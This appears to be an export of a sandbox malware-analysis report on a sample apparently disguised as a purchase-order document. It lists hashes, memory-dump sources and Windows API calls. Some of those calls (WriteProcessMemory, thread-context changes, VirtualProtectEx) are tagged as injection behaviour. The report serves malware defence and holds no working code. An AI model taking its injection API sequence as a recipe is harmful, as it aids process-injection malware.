Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8710000_Drawing specification and June PO #07329.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88d35557b89e3e93d1d58eeed69fce9106ea139c64e9f57e5c67e536c708b26d
Instruction ID: 014b6afd9825e9f239b12334f0b8293ff18783984ba8a26c79274bbe90dcd4a9
Opcode Fuzzy Hash: 88d35557b89e3e93d1d58eeed69fce9106ea139c64e9f57e5c67e536c708b26d
Instruction Fuzzy Hash: 0DD1E731D1065ACACB11EB64D990ADDB7B1FFA5300F20D79AE54A77214FB70AAC5CB40

Function 066FD498 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2575021494.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_66f0000_Drawing specification and June PO #07329.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 622638578f75b2cd1ff1b5c4924c5106dbf7249bc07179ecb0238a22786dc6b5
Instruction ID: 2a3a6af41b2e7c4942b2447580f55e80c80be759bcf971902649880f3feed010
Opcode Fuzzy Hash: 622638578f75b2cd1ff1b5c4924c5106dbf7249bc07179ecb0238a22786dc6b5
Instruction Fuzzy Hash: 2DC106B0C81746CAD710CF65F84C1897BB2BB85324F914B09D2A16B3E1DBB418EACF64

Analysis Process: file.exePID: 4052, Parent PID: 4004COMMON

Execution Graph

Execution Coverage:	18.6%
Dynamic/Decrypted Code Coverage:	93.9%
Signature Coverage:	1.7%
Total number of Nodes:	180
Total number of Limit Nodes:	6

Executed Functions

Function 079C1127 Relevance: 5.6, Instructions: 5650
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000C.00000002.4679523585.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_79c0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cf2820a23952cd2ccb02675f5519d05edbd4cb15d560cdce298daacd799f85e
Instruction ID: a7866f169803f52ea2ba6b6790d75191cb77a84be2e7823d50fd6efe14ec92e7
Opcode Fuzzy Hash: 6cf2820a23952cd2ccb02675f5519d05edbd4cb15d560cdce298daacd799f85e
Instruction Fuzzy Hash: 34C32C70A062188FCB58FF79E9996ADBBB2FF89200F4045E9D448A7350DB345E85CF46

Function 079C1140 Relevance: 5.6, Instructions: 5633
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000C.00000002.4679523585.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_79c0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cce3c7760043e8f0b03683789cf3e168d904dd87b1899a6ecedd8d16ed6c3a9
Instruction ID: 956663ddefee9d162828fe0abe33f6c4b449cc93de1b2edf0ac52319a2a59643
Opcode Fuzzy Hash: 7cce3c7760043e8f0b03683789cf3e168d904dd87b1899a6ecedd8d16ed6c3a9
Instruction Fuzzy Hash: 77C32C70A062188FCB58FF79E9996ADBBB2FF89200F4045E9D448A7350DB345E85CF46

Function 0910A848 Relevance: 1.7, APIs: 1, Instructions: 164
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessAsUserW.KERNEL32(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 0910A9B3

Memory Dump Source

Source File: 0000000C.00000002.4680104220.0000000009100000.00000040.00000800.00020000.00000000.sdmp, Offset: 09100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_9100000_file.jbxd

Similarity

API ID: CreateProcessUser
String ID:
API String ID: 2217836671-0
Opcode ID: 88f941089c63d17ea15552bacadf468a4fe33a773a4817b211878f66f7397118
Instruction ID: a7a19cb204a83a26e344932f4c008c7bd8a0bd2678020a018f29bf1263d90b8e
Opcode Fuzzy Hash: 88f941089c63d17ea15552bacadf468a4fe33a773a4817b211878f66f7397118
Instruction Fuzzy Hash: 3F51D471D0022ADFDB24CF59C944BDEBBB5BF88304F0585AAE909B7250DB719A85CF90

Function 00B87B08 Relevance: .4, Instructions: 430COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4652185019.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b80000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5464b21d80584e2a76ab236cb9e347b50c3d7085339182df90eb056ee6d7e34d
Instruction ID: 762c7223be2893bf8800d4dfc7af99d050d8d5939086d486b701c9b484421bb8
Opcode Fuzzy Hash: 5464b21d80584e2a76ab236cb9e347b50c3d7085339182df90eb056ee6d7e34d
Instruction Fuzzy Hash: 3BF16B71A002198FDB14DF69D8547AE7BF6BF88304F248599E509DB3A1DE34DD41CB90

Function 00B8823C Relevance: .3, Instructions: 330COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4652185019.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b80000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ffe5d795aea1f35d697666c855f1ca86533e3b07922ed54bcb06ab7cfe099c7
Instruction ID: 6ae3df1c9ebc37849969be81570e6408f3a3fffe5c78cb663d4091bf170b0b37
Opcode Fuzzy Hash: 0ffe5d795aea1f35d697666c855f1ca86533e3b07922ed54bcb06ab7cfe099c7
Instruction Fuzzy Hash: 19D10971A00209DFCB14EFA9D984AADBBF2FF98340F958195E805AB271DB30ED41CB51

Function 00B84774 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4652185019.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b80000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abca4fac4fc2d605a3c0911fa452b8e260f7294cbd1b76fd5373c6cbe8d55301
Instruction ID: 6a20772526175605a520e10aec7f5ceb420c47f4f5d366ff29fc522c522bfcb0
Opcode Fuzzy Hash: abca4fac4fc2d605a3c0911fa452b8e260f7294cbd1b76fd5373c6cbe8d55301
Instruction Fuzzy Hash: 9FE1B574E00219CFDB24DFA9C884BAEBBF2BF89300F1481A9D549AB365DB345985CF50

Function 079CE666 Relevance: .3, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4679523585.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_79c0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87b92e291b10e4f7b4689cf1c08a4664eb211e89385c7e0278d7c717a9b5c92e
Instruction ID: 74bacd500c9c89803e8f79d0ecf09d80029ea32a2119e77b3b4360b921fc4d15
Opcode Fuzzy Hash: 87b92e291b10e4f7b4689cf1c08a4664eb211e89385c7e0278d7c717a9b5c92e
Instruction Fuzzy Hash: 30D147B0E1020ADFCB14CFA5C5819AEFBB2FF89345F24C959E416AB254D734A942CF91

Function 00B8AEC0 Relevance: .2, Instructions: 175COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4652185019.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b80000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0007897dc297c520401d9de602db9205c0bef85ffc89d1931da18e565ed38556
Instruction ID: 1747e16698bd33995dc91fa2c0cc35afb839dcd66f1e0d210199f8c4de2512ce
Opcode Fuzzy Hash: 0007897dc297c520401d9de602db9205c0bef85ffc89d1931da18e565ed38556
Instruction Fuzzy Hash: B3612971E002098FDB14DFA9C484AAEFBF2FF89311F1481AAE504A7361D734A941CBA1

Function 00B8AF11 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4652185019.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b80000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad16ff59681c9ac50141e2b4978999b87609610e835d2b067f58450b3846f476
Instruction ID: 34aab89b249371c31991b8d524825314ef5ae9a2a4f43316e335a03603ea9174
Opcode Fuzzy Hash: ad16ff59681c9ac50141e2b4978999b87609610e835d2b067f58450b3846f476
Instruction Fuzzy Hash: 0141C2B1E012099FDB18DFAAD584ADEFBF2AF89310F14906AE414B7360DB309941CF51

Function 079CD788 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4679523585.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_79c0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 825ad30400cd32eb25a9eb3620d8db1b67fbd0f3fea19261a9f819f62879cdb2
Instruction ID: 86e1049d97e10840fbf88b243f27fd8ff69b131729659e2266d457872eec7f4d
Opcode Fuzzy Hash: 825ad30400cd32eb25a9eb3620d8db1b67fbd0f3fea19261a9f819f62879cdb2
Instruction Fuzzy Hash: 4A21D6B1E006188BEB18CFAAD9443DEBBF7AFC8310F14C02AD509A6254EB7519458F91

Function 079CD778 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4679523585.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_79c0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 630f6a5993c002504271922a6bcd28c4b7c5d20594f697980087aed6decaf6bf
Instruction ID: 13ef57d2306748797d9160173143864024d35dda598cca24228d86730800d755
Opcode Fuzzy Hash: 630f6a5993c002504271922a6bcd28c4b7c5d20594f697980087aed6decaf6bf
Instruction Fuzzy Hash: C631B4B1E006198BEB18CFAAD9447DEBBF7AFC8300F14C02AD409A6254EB7519468F91

Function 079CEC61 Relevance: 3.8, Strings: 3, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

tu}s, xrefs: 079CECAA
tu}s, xrefs: 079CECE0
{ :, xrefs: 079CED2E

Memory Dump Source

Source File: 0000000C.00000002.4679523585.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_79c0000_file.jbxd

Similarity

API ID:
String ID: tu}s$tu}s${ :
API String ID: 0-3169588376
Opcode ID: c5f9a0b9a1b15b2b23f3145e514f3f59739c5577154475c2990bba94c63f6cb6
Instruction ID: 9782a57545171614329a8d6259b470ba4b286195778ec905938e1dd237337797
Opcode Fuzzy Hash: c5f9a0b9a1b15b2b23f3145e514f3f59739c5577154475c2990bba94c63f6cb6
Instruction Fuzzy Hash: 352148B0E0160ADFDB04CFA9D5446AEBBF6BF89300F14C5AA8506A7258D7309B41CB96

Function 079CEC70 Relevance: 3.8, Strings: 3, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

tu}s, xrefs: 079CECAA
tu}s, xrefs: 079CECE0
{ :, xrefs: 079CED2E

Memory Dump Source

Source File: 0000000C.00000002.4679523585.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_79c0000_file.jbxd

Similarity

API ID:
String ID: tu}s$tu}s${ :
API String ID: 0-3169588376
Opcode ID: 1863ddd0ffc85ab7ce0c49fd3ee8559b398d22058f012b4f3395cd7180678e1b
Instruction ID: 85b48e78154cf4fb799d124f1ad911cbd6714f0b301267aa49e92cb170c1dd2a
Opcode Fuzzy Hash: 1863ddd0ffc85ab7ce0c49fd3ee8559b398d22058f012b4f3395cd7180678e1b
Instruction Fuzzy Hash: 322128B0E1160ADFDB04DFA9C544AAEFBF6BF89200F14C5A9C505AB254D7309B41CF56

Function 06326EC8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32(0000004B), ref: 06326FAD

Strings

t, xrefs: 06326F21

Memory Dump Source

Source File: 0000000C.00000002.4678128294.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6320000_file.jbxd

Similarity

API ID: MetricsSystem
String ID: t
API String ID: 4116985748-2238339752
Opcode ID: 05b83c176c24ca49e73256d187819b7fd1c296326176c43d701da3e5fe886147
Instruction ID: 8494da7732885b864fb502af77563387d60614ac11a3a0a22b7dc723eac1819d
Opcode Fuzzy Hash: 05b83c176c24ca49e73256d187819b7fd1c296326176c43d701da3e5fe886147
Instruction Fuzzy Hash: 7B312271805795DFDB01DFA9E8417AB7FF4EF02304F08809AD888A7292D3B89548CFA1

Function 06328450 Relevance: 1.7, APIs: 1, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 063286A6

Memory Dump Source

Source File: 0000000C.00000002.4678128294.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6320000_file.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 76a98326285f7f54bac3e64a32d5a7d9256dc010921ef7f16d5a4c370ef5c3ef
Instruction ID: 5ab98149f95831625c1a27cdc0bebb01c579f8f6b8282609b3b3dfd3658efd1d
Opcode Fuzzy Hash: 76a98326285f7f54bac3e64a32d5a7d9256dc010921ef7f16d5a4c370ef5c3ef
Instruction Fuzzy Hash: 01714570A00B168FDBA4DF29D45075ABBF5FF88300F14892ED48AD7A50EB75E949CB90

Function 079CB508 Relevance: 1.7, Strings: 1, Instructions: 437
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@, xrefs: 079CB9BC

Memory Dump Source

Source File: 0000000C.00000002.4679523585.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_79c0000_file.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 6f63e532d0b504fc7021c54a727c5b1378b04e05c90c550a6b6cc9691424e645
Instruction ID: 70d5fe0ec08c02767f93451ac9b8273729c295fab866b05c054b94e739271f35
Opcode Fuzzy Hash: 6f63e532d0b504fc7021c54a727c5b1378b04e05c90c550a6b6cc9691424e645
Instruction Fuzzy Hash: 24D1B3B0B193448FCB08FFB9E89A56D7BF1EF89200F4144A9E495DB361DE389849CB51

Function 0632ED44 Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0632EE62

Memory Dump Source

Source File: 0000000C.00000002.4678128294.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6320000_file.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 218ea9bb9a88bbda94415cf2cb7b098b8febc5ea4ec58b327633bc9551f7400b
Instruction ID: 7615102ba8d9eb9e9cf06313681e7362142abe7e4e9a188d7b94a47dbeeb9abf
Opcode Fuzzy Hash: 218ea9bb9a88bbda94415cf2cb7b098b8febc5ea4ec58b327633bc9551f7400b
Instruction Fuzzy Hash: 2E51CDB1D00359DFDB54CFAAC885ADEBBB5FF88310F24812AE819AB210D7749845CF90

Function 0632ED50 Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0632EE62

Memory Dump Source

Source File: 0000000C.00000002.4678128294.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6320000_file.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: ea6a9a35f229bfc2fe9ee92c22e1a7537eb0e3a637144f53b342246941691ae6
Instruction ID: adba47e21710662699a35f8de6133a412ce448eff7cfc7222a8b348118818ba7
Opcode Fuzzy Hash: ea6a9a35f229bfc2fe9ee92c22e1a7537eb0e3a637144f53b342246941691ae6
Instruction Fuzzy Hash: 2B41BFB1D00359DFDB14CFAAC885ADEBBB5FF88310F24812AE819AB210D7759845CF90

Function 07A4D5EF Relevance: 1.6, APIs: 1, Instructions: 100memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 07A4D6AB

Memory Dump Source

Source File: 0000000C.00000002.4679731501.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7a40000_file.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 68305cfed5599ce16e1bf57f0b32ed7f15e4ed5d934463cfdd64d11244d09c6b
Instruction ID: 8952dec7ecad5c2b4fea42a7676230cbdf843e8be42179006caaf0a574cf9e4d
Opcode Fuzzy Hash: 68305cfed5599ce16e1bf57f0b32ed7f15e4ed5d934463cfdd64d11244d09c6b
Instruction Fuzzy Hash: 4731AD729012099FCB10DF9AD8846DEFFF0EFA8320F00811AE468A7241C3759545CFE5

Function 06310C70 Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 06310D31

Memory Dump Source

Source File: 0000000C.00000002.4678041277.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6310000_file.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: b50542c2e69b6d3e692b47e53ea5d7bd765125d15e02847a6d0f6d45ec445a9d
Instruction ID: 586038da7ca6265c820bef5fc79e71fe4294b98cbf1fa9def61b63bb42ee7352
Opcode Fuzzy Hash: b50542c2e69b6d3e692b47e53ea5d7bd765125d15e02847a6d0f6d45ec445a9d
Instruction Fuzzy Hash: E04136B8900309CFDB58CF99C848AAABBF5FF88314F24C459D519AB321D774A845CFA0

Function 0910CEA8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0910CF38

Memory Dump Source

Source File: 0000000C.00000002.4680104220.0000000009100000.00000040.00000800.00020000.00000000.sdmp, Offset: 09100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_9100000_file.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 500be03ca12d3b520a9163d22a0375e1867b3f183bca4995bef15f48d0f40bf7
Instruction ID: 730df07fd969c2248bca3a881da80f4b8a94a18988da944786a81eb4b4bf3486
Opcode Fuzzy Hash: 500be03ca12d3b520a9163d22a0375e1867b3f183bca4995bef15f48d0f40bf7
Instruction Fuzzy Hash: 362124719003499FEB10CFAAC981BDEBBF5FF88314F10842AE959A7240C7799954CBA5

Function 0632AD28 Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0632ADB7

Memory Dump Source

Source File: 0000000C.00000002.4678128294.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6320000_file.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 2f693d576b7e62c24c66639d9dc686c77db6bbfb033c1144196d509c1f06f448
Instruction ID: dd467def6b4d5e81f17e8b7ef4e6e032ea63c699450c1aa3e082d7737c057332
Opcode Fuzzy Hash: 2f693d576b7e62c24c66639d9dc686c77db6bbfb033c1144196d509c1f06f448
Instruction Fuzzy Hash: 8421F4B5800259EFDB10CF9AD884ADEBBF8EF48310F14841AE914A3310C378A944CFA1

Function 0910D628 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0910D6A6

Memory Dump Source

Source File: 0000000C.00000002.4680104220.0000000009100000.00000040.00000800.00020000.00000000.sdmp, Offset: 09100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_9100000_file.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 59bd8de0e6d93eee03b7778a40cd70f47b64351df6f57bde85434daf4be18b5f
Instruction ID: 17d4205c6f8c98dbf5eeeb0f592c6e28346b4a9c85d92487c864450f6759867e
Opcode Fuzzy Hash: 59bd8de0e6d93eee03b7778a40cd70f47b64351df6f57bde85434daf4be18b5f
Instruction Fuzzy Hash: 1D213871D003098FDB10DFAAC4857AEBBF4EF88314F548429D559A7280C7789944CFA5

Function 0910C460 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0910C4DE

Memory Dump Source

Source File: 0000000C.00000002.4680104220.0000000009100000.00000040.00000800.00020000.00000000.sdmp, Offset: 09100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_9100000_file.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: fdcbcc3ddf56d68dfdd667e86bcac12a90519e1d04a277c9b3aab9b48975b10e
Instruction ID: aa90ba62422861e88a47dd86ab3a4c0c6213530a7184d6ed038fcb0d33f8df1c
Opcode Fuzzy Hash: fdcbcc3ddf56d68dfdd667e86bcac12a90519e1d04a277c9b3aab9b48975b10e
Instruction Fuzzy Hash: C4213571D003098FEB10DFAAC485BAEBBF4FF88314F14842AD559A7240CBB89945CFA4

Function 0632AD30 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0632ADB7

Memory Dump Source

Source File: 0000000C.00000002.4678128294.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6320000_file.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: a9d1edafe8db9109d8862dc1ef18820a9297c50dbb32c9cbf88de7b434cb2c6b
Instruction ID: fc1c08466bd132e5c5c4bc6dc2591527234739dc5284cb0724f997a03f1a0243
Opcode Fuzzy Hash: a9d1edafe8db9109d8862dc1ef18820a9297c50dbb32c9cbf88de7b434cb2c6b
Instruction Fuzzy Hash: 9A21E4B5900349DFDB10CFAAD884ADEBBF8EF48310F14841AE914A3310C378A944CFA5

Function 0910D3A0 Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

VirtualProtectEx.KERNEL32(?,?,?,?,?), ref: 0910D417

Memory Dump Source

Source File: 0000000C.00000002.4680104220.0000000009100000.00000040.00000800.00020000.00000000.sdmp, Offset: 09100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_9100000_file.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: b97e56918f8ce36a702b2f0a0033bf0eecf933763bd98270be11aa4268ed4fc7
Instruction ID: 5a703efe3c6cb72ef63fe72e083b6a19f3849f2fb81ea360bd34389806315d50
Opcode Fuzzy Hash: b97e56918f8ce36a702b2f0a0033bf0eecf933763bd98270be11aa4268ed4fc7
Instruction Fuzzy Hash: AC211571D003499FDB10DFAAC841BEEBBF5EF88320F14842AE519A7240C779A944CFA5

Function 091034B3 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 0910352B

Memory Dump Source

Source File: 0000000C.00000002.4680104220.0000000009100000.00000040.00000800.00020000.00000000.sdmp, Offset: 09100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_9100000_file.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 653cf8c494274c9d4a34c7a5a3fee89b9588b3296ad544abbd5484ae909ff582
Instruction ID: 67a7bfaa51c8452ddaeb904ace1faa05bc7de58ef4fb4e44e56f97d9660155b4
Opcode Fuzzy Hash: 653cf8c494274c9d4a34c7a5a3fee89b9588b3296ad544abbd5484ae909ff582
Instruction Fuzzy Hash: 072106B1D006499FDB10CF9AC584BDEFBF4EB88314F108029E968A7250D379A645CFA5

Function 067590A0 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000), ref: 06759110

Memory Dump Source

Source File: 0000000C.00000002.4678694530.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6750000_file.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 0632651669e8763b09baacd1975c405fe19f787390bd65d70dce195988221afc
Instruction ID: 6bb05e09069d7a9af297ba170dc86fccf293abd59d674a903c2dd72b13dca7bc
Opcode Fuzzy Hash: 0632651669e8763b09baacd1975c405fe19f787390bd65d70dce195988221afc
Instruction Fuzzy Hash: B01136B1C0065ADBDB10CF9AC445BAEFBF4FF48720F11816AD918A7240D378A944CFA5

Function 07A4D638 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 07A4D6AB

Memory Dump Source

Source File: 0000000C.00000002.4679731501.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7a40000_file.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: cd0915f7394b44d72af1c91e2c90cb78ab84a9f38e18a36f15dcb676ad07445c
Instruction ID: 5bea9bc48939a1033b97b10e2368299f6c0e01cb809828776ffe52e1aa94d803
Opcode Fuzzy Hash: cd0915f7394b44d72af1c91e2c90cb78ab84a9f38e18a36f15dcb676ad07445c
Instruction Fuzzy Hash: 192103B1900649DFDB10DF9AC484BDEFBF4EB88320F108429E968A7250D378A544CFA5

Function 06327808 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,06328721,00000800,00000000,00000000), ref: 06328932

Memory Dump Source

Source File: 0000000C.00000002.4678128294.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6320000_file.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 05d72ca00e1c09a3c34d32f1fb30db4097f6bd284ea923d96a426a164c4899b2
Instruction ID: ed4f2ecc5059407f17b5379b98526d33cbc399a62716e31bae8d899cb734c34b
Opcode Fuzzy Hash: 05d72ca00e1c09a3c34d32f1fb30db4097f6bd284ea923d96a426a164c4899b2
Instruction Fuzzy Hash: B41103B68003499FDB10CF9AC444A9EFBF4EB88710F10842AD959A7200C379A549CFA5

Function 091034B8 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 0910352B

Memory Dump Source

Source File: 0000000C.00000002.4680104220.0000000009100000.00000040.00000800.00020000.00000000.sdmp, Offset: 09100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_9100000_file.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 5e7485ff05659876e955402eeeb5a4f1c5fab34c41c296e217fea1d47fa449a4
Instruction ID: dc2ea83c8744d91905fe84471b8924655b05637daa43f1de0d0b3ced2a468fd7
Opcode Fuzzy Hash: 5e7485ff05659876e955402eeeb5a4f1c5fab34c41c296e217fea1d47fa449a4
Instruction Fuzzy Hash: 252103B1D006499FDB10CF9AC484BDEFBF4EB88320F108029E968A7250D378A644CFA5

Function 063288C0 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,06328721,00000800,00000000,00000000), ref: 06328932

Memory Dump Source

Source File: 0000000C.00000002.4678128294.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6320000_file.jbxd

Similarity

API ID: LibraryLoad
String ID:
